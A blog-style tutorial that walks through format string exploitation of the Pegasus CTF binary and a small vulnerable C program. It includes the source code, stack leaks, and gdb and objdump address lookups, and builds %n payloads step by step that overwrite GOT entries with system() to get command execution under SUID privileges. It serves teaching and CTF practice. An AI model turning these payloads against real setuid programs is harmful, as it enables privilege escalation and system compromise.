Format string vulnerabilities made easy

Hey all. I'm writing this 50% to help everyone out, but 50% to reinforce it for myself :P

I DUN LIKE FORMAT STRING VULNS, but I'm going to be good at them! Maybe someday I'll like them more.

Here we go, I'm going to test on the binary for Pegasus (source will be later on in the post), and also a few more that I can find online. Everything will be 32-bit.

A few things before we start:

  • I will be working with 32-bit binaries only. (-m32 in gcc)
  • ASLR needs to be disabled.
    • 32-bit system: ulimit -s unlimited
    • 64-bit system: echo "0" > /proc/sys/kernel/randomize_va_space

Okay, here we go!

Pegasus Binary

The source code was released in the image. First we'll do this manually.

#include <stdio.h>
#include <stdlib.h>

int calculator();  
int string_replay();  
int string_reverse();  
int quit();

int main()  
{
    char selection[5];
    int sel;
    char * err_check;

    printf("WELCOME TO MY FIRST TEST PROGRAM\n");
    printf("--------------------------------\n");
    printf("Select your tool:\n");
    printf("[1] Calculator\n");
    printf("[2] String replay\n");
    printf("[3] String reverse\n");
    printf("[4] Exit\n\n");

    do
    {
        printf("Selection: ");
        if (fgets(selection, sizeof selection, stdin) != NULL)
        {
            sel = strtol(selection, &err_check, 10);
            switch (sel)
            {
                case 1:
                {
                    calculator();
                    break;
                }
                case 2:
                {
                    string_replay();
                    break;
                }
                case 3:
                {
                    string_reverse();
                    break;
                }
                case 4:
                {
                    quit();
                    break;
                }
                default:
                {
                    printf("\nError: Incorrect selection!\n\n");
                }
            }
        }
        else
        {
            printf("\nBye!\n");
            break;
        }
    }
    while (sel != 4);
}

int calculator()  
{
    char numberA[50];
    char numberB[50];
    char * err_check;
    printf("\nEnter first number: ");
    if (fgets(numberA, sizeof numberA, stdin) != NULL)
    {
        printf("Enter second number: ");
        if (fgets(numberB, sizeof numberB, stdin) != NULL)
        {
            int numA = strtol(numberA, &err_check, 10);
            int numB = strtol(numberB, &err_check, 10); 
            if (*err_check != '\n')
            {
                printf("Error details: ");
                printf(err_check);
                printf("\n");
                return 1;
            }
            else
            {
                int sum = numA + numB;
                printf("Result: %i + %i = %i\n\n", numA, numB, sum);
                return 0;
            }
        }
        else
        {
            printf("\nBye!\n");
            return 1;
        }
    }
    else
    {
        printf("\nBye!\n");
        return 1;
    }
}

int string_replay()  
{
    char input[100];
    printf("\nEnter a string: ");
    if (fgets(input, sizeof input, stdin) != NULL)
    {
        printf("You entered: %s\n", input);
    }
    else
    {
        printf("\nBye!\n");
        return 1;
    }
    return 0;
}

int string_reverse()  
{
    //TODO
    printf("\nError: Not yet implemented!\n\n");
    return 1;
}

int quit()  
{
    printf("\nGoodbye!\n");
    return 0;
}

If you have the source code to look at, what you really want to watch out for is printf(variable). This means that we can inject code, such as %x and %n, to do things that were unintended during the creation of the program.

So, copy that code into a file, and compile it.

root@shadow ~/formatstr$ gcc -m32 -o pegasus pegasus.c  

And now we have our vulnerable program. So, lets run it and see what it does. According to the source code, we need to focus on the calculator() function, but if we didn't have the source code a bit of fuzzing would be required.

WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection: 1

Enter first number: 5  
Enter second number: 2  
Result: 5 + 2 = 7

Selection: 4

Goodbye!  

So, it works as expected. We plugged in some numbers and got the sum. What happens if we plug in a format string character, like %x?

root@shadow ~/formatstr$ ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection: 1

Enter first number: 1  
Enter second number: %x  
Error details: ff9d445c

Selection: 4

Goodbye!  

Ooooh! It spit back some data off the stack! We can use printf in BASH to make it easier to navigate the menu, and faster to test the exploits.

root@shadow ~/formatstr$ printf '1\n1\n%%x\n4\n' | ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ffcf492c

Selection:  
Goodbye!  

Note the double %% is required to escape the character in printf.

Now, lets see where data is stored on the stack. We are going to send four A's, and then keep adding %x until we see 0x41414141.

root@shadow ~/formatstr$ printf '1\n1\nAAAA.%%x.%%x.%%x.%%x.%%x.%%x.%%x.%%x\n4\n' | ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: AAAA.ffb24c7c.a.ffb24c7c.f7750ff4.3.3.ffb24c80.41414141

Selection:  
Goodbye!  

Which is 8 places in. We can shorten this to give us exactly what we want.

root@shadow ~/formatstr$ printf '1\n1\nAAAA.%%8$x\n4\n' | ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: AAAA.41414141

Selection:  
Goodbye!  

So now we can write to the stack. Great! But what are we going to do with that power? Using printf()'s %n format string character, we are able to write data to an address. What we want to do, is replace the GOT address for printf() with the address for system(), so when the program calls printf(), we are able to run something with system() instead.

So, lets collect the addresses that we need. We are going to need the address of printf() and the address of system(). For printf(), we can simply use objdump, but system() is going to require just a little bit more work.

root@shadow ~/formatstr$ objdump -R pegasus

pegasus:     file format elf32-i386

DYNAMIC RELOCATION RECORDS  
OFFSET   TYPE              VALUE  
08049bec R_386_GLOB_DAT    __gmon_start__  
08049c20 R_386_COPY        stdin  
08049bfc R_386_JUMP_SLOT   printf  
08049c00 R_386_JUMP_SLOT   fgets  
08049c04 R_386_JUMP_SLOT   puts  
08049c08 R_386_JUMP_SLOT   __gmon_start__  
08049c0c R_386_JUMP_SLOT   __libc_start_main  
08049c10 R_386_JUMP_SLOT   putchar  
08049c14 R_386_JUMP_SLOT   strtol  

This shows printf() to be at the address 0x08049bfc. Now to find system(), we are going to need to use gdb.

root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) break main
Breakpoint 1 at 0x804850f  
(gdb) run
Starting program: /root/formatstr/pegasus 

Breakpoint 1, 0x0804850f in main ()  
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e91c30 <system>
(gdb)

So system() lives at 0xf7e91c30. Note: your addresses are probably different. Just follow along with the steps and you should get the same outcome.

Now would actually be a good time to make sure that ASLR is disabled, or else the exploit will fail.

root@shadow ~/formatstr$ ldd pegasus  
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)
root@shadow ~/formatstr$ ldd pegasus  
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)
root@shadow ~/formatstr$ ldd pegasus  
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)

Just make sure that the same addresses show up each time.

Now onto the exploit. First we are going to change from AAAA to the address we are targeting, then try to write to it.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08%%8$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ��


Program received signal SIGSEGV, Segmentation fault.  
0x00000004 in ?? ()  

So, %n writes the value of the amount of bytes you have written to the stack. Using the address, we have written four bytes, hence the value being 0x00000004. We want to change that 0x4 to our system() address. We will do this two bytes at a time. So, the next thing that we want to accomplish, is to get that address to say 0x00001c30. How do we do that? Great question! We need to write a total of 0x1c30 characters. We have already written 0x4, so we can use python to determine the decimal value that we need to write.

root@shadow ~/formatstr$ python -c 'print 0x1c30-0x4'  
7212  

Now we can alter our payload to send 7212 additional bytes.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08%%7212u%%8$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ��

...

Program received signal SIGSEGV, Segmentation fault.  
0x00001c30 in ?? ()  

Hey look at that! Our number has become exactly what we wanted! Well, half of it anyways. Now lets get the first half!

We are going to add the address again, but this time instead of \xfc we are going to put \xfe. This is because you have to write the address in two parts. \xfc is the upper address, and \xfe is the lower address of printf(). When we duplicate at the end the %%8$n, we are going to need to change that to %%9$n to compensate for the two bytes that we already wrote. You'll see what I mean below.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08\xfe\x9b\x04\x08%%7212u%%8$n%%9$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ���

...

Program received signal SIGSEGV, Segmentation fault.  
0x1c341c34 in ?? ()  

Now we have written to both halves! The only thing we need to do now is set the correct value of the second half! (0xf7e9) One thing to note, is that instead of 0x1c30, it is now 0x1c34. This is because we wrote an additional four bytes with that second address. Now we need to subtract 4 from 7212.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08\xfe\x9b\x04\x08%%7208u%%8$n%%9$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ����

...

Program received signal SIGSEGV, Segmentation fault.  
0x1c301c30 in ?? ()  

There we go! That looks better. Now we are going to use python to find our offset again.

root@shadow ~/formatstr$ python -c 'print 0xf7e9-0x1c30'  
56249  

Note, one problem that I ran into was I was getting negative numbers when running this on the actualy Pegasus machine. If that happens, simply add the least significant bit, as the following:

root@shadow ~/formatstr$ python -c 'print 0x1f7e9-0x1c30'  

But only do that if you initially get a negative number.

Now we can plug this number into our exploit!

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08\xfe\x9b\x04\x08%%7208u%%8$n%%56249u%%9$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ����

...

sh: 1: Selection:: not found

Program received signal SIGSEGV, Segmentation fault.  
0xf7eb0006 in ?? () from /lib/i386-linux-gnu/i686/cmov/libc.so.6  

Hooray it worked! Now, for this particular program, we replaced printf("Selection :") with system("Selection: ") which is why it says sh: 1: Selection:: not found. For this, we simply had to make a file named Selection: that it could run. We had complete control!

fmtstr

Here is the source of this file:

#include <stdio.h>

void vulnfunction(char *msg)  
{
    printf(msg);
}

int main(int argc, char **argv)  
{
    char buff[256];

    printf("Input: ");
    fgets(buff, 256, stdin);
    vulnfunction(buff);
    printf("Bye\n");
    return 0;
}

When running it, we can easily find our stack offset.

root@shadow ~/formatstr$ ./fmtstr  
Input: AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x  
AAAA.0.ff839320.f7760ff4.0.0.ff839428.8048500.ff839320.100.f7761440.0.41414141  
root@shadow ~/formatstr$ ./fmtstr  
Input: AAAA.%12$x  
AAAA.41414141  
Bye  

So now we know that our offset is 12 bytes. Now lets start collecting addresses. So, looking at the disassembled code, we see that after vulnfunction() is called, it will call puts()

root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) disas main
Dump of assembler code for function main:  
   0x080484bf <+0>:    push   %ebp
   0x080484c0 <+1>:    mov    %esp,%ebp
   0x080484c2 <+3>:    and    $0xfffffff0,%esp
   0x080484c5 <+6>:    sub    $0x110,%esp
   0x080484cb <+12>:    movl   $0x80485b0,(%esp)
   0x080484d2 <+19>:    call   0x8048370 <printf@plt>
   0x080484d7 <+24>:    mov    0x8049788,%eax
   0x080484dc <+29>:    mov    %eax,0x8(%esp)
   0x080484e0 <+33>:    movl   $0x100,0x4(%esp)
   0x080484e8 <+41>:    lea    0x10(%esp),%eax
   0x080484ec <+45>:    mov    %eax,(%esp)
   0x080484ef <+48>:    call   0x8048380 <fgets@plt>
   0x080484f4 <+53>:    lea    0x10(%esp),%eax
   0x080484f8 <+57>:    mov    %eax,(%esp)
   0x080484fb <+60>:    call   0x80484ac <vulnfunction>
   0x08048500 <+65>:    movl   $0x80485b8,(%esp)
   0x08048507 <+72>:    call   0x8048390 <puts@plt>
   0x0804850c <+77>:    mov    $0x0,%eax
   0x08048511 <+82>:    leave  
   0x08048512 <+83>:    ret    
End of assembler dump.  

So we are going to look for the GOT address of puts() using objdump.

root@shadow ~/formatstr$ objdump -R ./fmtstr                                                                                                                                                                  

./fmtstr:     file format elf32-i386

DYNAMIC RELOCATION RECORDS  
OFFSET   TYPE              VALUE  
0804975c R_386_GLOB_DAT    __gmon_start__  
08049788 R_386_COPY        stdin  
0804976c R_386_JUMP_SLOT   printf  
08049770 R_386_JUMP_SLOT   fgets  
08049774 R_386_JUMP_SLOT   puts  
08049778 R_386_JUMP_SLOT   __gmon_start__  
0804977c R_386_JUMP_SLOT   __libc_start_main  

Now for system(), we can leak the address with gdb.

root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) break main
Breakpoint 1 at 0x80484c2  
(gdb) run
Starting program: /root/formatstr/fmtstr 

Breakpoint 1, 0x080484c2 in main ()  
(gdb) print system
$1 = {<text variable, no debug info>} 0x555d3c30 <system>

So we have our two addresses.
0x08049774 = puts()
0x555d3c30 = system()

Now to start our exploit. This is pretty much going to go just like the Pegasus program, so this should seem fairly familiar if you already followed along with that one.

First thing we'll do, is use BASH's printf program to create our payload, then run in gdb to see what happens. We are going to send the address that we want to overwrite, then the offset, the %n which will write the number of the amount of bytes written so far to that address.

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08%%12$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) r < payload 
Starting program: /root/formatstr/fmtstr < payload

Program received signal SIGSEGV, Segmentation fault.  
0x00000004 in ?? ()  
(gdb)

So, since we have written four bytes with the address, the value is now 0x4. We are going to focus on writing this one half at a time. We want to make that 0x4 into the address of system(). We will focus on the second half first, which is 0x3c30. We need to find that in a decimal number, but we also want to subtract the bytes we have already written. We are going to use that number to send that amount of data, so that %n will write the value we want.

We can use python to find what the value should be.

root@shadow ~/formatstr$ python -c 'print 0x3c30-0x4'  
15404  

So we can put that value into our payload, and run it to see what our address is now.

root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/fmtstr < payload  
Input: t�

...

Program received signal SIGSEGV, Segmentation fault.  
0x00003c30 in ?? ()  

Hooray! We wrote 0x3c30 to our address! Now lets get our first half! We are going to write another address, which will be two bytes more, pointing to the upper part of our address. We will also need to add %%13$n to the end of our payload. It is now 13 instead of 12 to compensate for what we have already written.

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08\x76\x97\x04\x08%%15404u%%12$n%%13$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload 
Starting program: /root/formatstr/fmtstr < payload  
Input: t�v�

...

Program received signal SIGSEGV, Segmentation fault.  
0x3c343c34 in ?? ()  

So something interesting happened here. We now have the same value written on each half, but it isn't 0x3c30 anymore, it is four bytes more! That is because we wrote four more bytes when writing our second address. We simply need to subtract four from our number (15404-4).

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08\x76\x97\x04\x08%%15400u%%12$n%%13$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/fmtstr < payload  
Input: t�v�

...

Program received signal SIGSEGV, Segmentation fault.  
0x3c303c30 in ?? ()  

There we go! That looks better. Now we need to fix the value of our first half. We will do this again by using python to figure out what number needs to be written.

We will take what we want, and subtract what have already written.

root@shadow ~/formatstr$ python -c 'print 0x555d-0x3c30'  
6445  

There we go, much better! So, all we need to do now, is plug that number in just like we did the first one!

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08\x76\x97\x04\x08%%15400u%%12$n%%6445u%%13$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/fmtstr < payload  
Input: t�v� 

...

sh: 1: Bye: not found  
4294957264[Inferior 1 (process 28657) exited normally]  

Hey! It exited normally? Hmm... Oh, it says that Bye: was not found. That is because we have overwritten the address of puts() from saying puts("Bye") to saying system("Bye") so now all we would need to do is create a file named Bye and put it in our path so when running, the program will execute our file with the priviledges of the SUID user.

Hooray! I hope this helps some of you struggling with format string vulns. I may add some more examples here in the future.